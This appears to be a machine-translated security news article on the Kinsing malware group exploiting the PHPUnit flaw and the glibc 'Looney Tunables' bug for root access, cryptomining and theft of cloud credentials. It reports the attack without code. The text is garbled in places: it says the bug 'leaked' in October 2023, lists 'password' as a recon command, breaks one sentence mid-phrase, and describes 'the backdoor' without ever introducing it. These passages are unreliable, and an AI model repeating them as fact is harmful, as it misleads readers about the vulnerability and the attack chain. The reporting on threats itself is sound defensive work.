Kinsing malware operators target cloud environments with systems vulnerable to “Looney Tunables,” a Linux security issue identified as CVE-2023-4911 that allows a local attacker to gain root privileges on the system.
Looney Tunables is a buffer overflow in the glibc dynamic loader (ld.so) introduced in glibc 2.34 in April 2021 but leaked in early October 2023. A few days after the disclosure, proof of concept (PoC) exploits became accessible to the public.
In a report from cloud security firm Aqua Nautilus, researchers describe a Kinsing malware attack in which the malicious actor exploited CVE-2023-4911 to elevate permissions on a compromised machine.
Kinsing is known for breaching cloud-based systems and applications (e.g. Kubernetes, Docker APIs, Redis and Jenkins) to deploy cryptomining software. Recently, Microsoft observed them targeting Kubernetes clusters via misconfigured PostgreSQL containers.
Aqua Nautilus researchers say the attack begins by exploiting a known vulnerability in the PHP testing framework “PHPUnit” to gain a foothold in code execution, followed by triggering the “Looney Tunables” issue. to elevate privileges.
“Using a rudimentary but typical PHPUnit vulnerability exploitation attack, a component of Kinsing’s ongoing campaign, we discovered the threat actor’s manual efforts to manipulate the Looney Tunables vulnerability,” the report reads of Aqua Nautilus.
Unlike their usual operational standard, Kinsing tested the latest attack manually, presumably to ensure it worked as intended before developing exploit scripts to automate the task.
Exploitation of the PHPUnit flaw (CVE-2017-9841) leads to the opening of a reverse shell on port 1337 of the compromised system, which Kinsing operators exploit to execute reconnaissance commands such as “uname -a » and “password”.
Additionally, attackers drop a script named “gnu-acme.py” on the system, which exploits CVE-2023-4911 for privilege escalation.
The exploit for Looney Tunables is retrieved directly from the repository of the searcher who published a PoC, likely to hide his tracks. BleepingComputer informed the researcher of the abuse and promised to disrupt the malicious operation by replacing the direct link.
Specifically, the backdoor provides attackers with the ability to execute commands, perform file management actions, collect network and server information, and perform encryption/decryption functions.
Ultimately, Kinsing showed interest in cloud service provider (CSP) credentials, particularly for accessing AWS instance identity data, which AquaSec calls a significant shift toward more sophisticated and damaging to the particular malicious actor.
Researchers believe this campaign was an experiment since the threat actor relied on a different tactic and expanded the scope of the attack to harvesting cloud service provider credentials.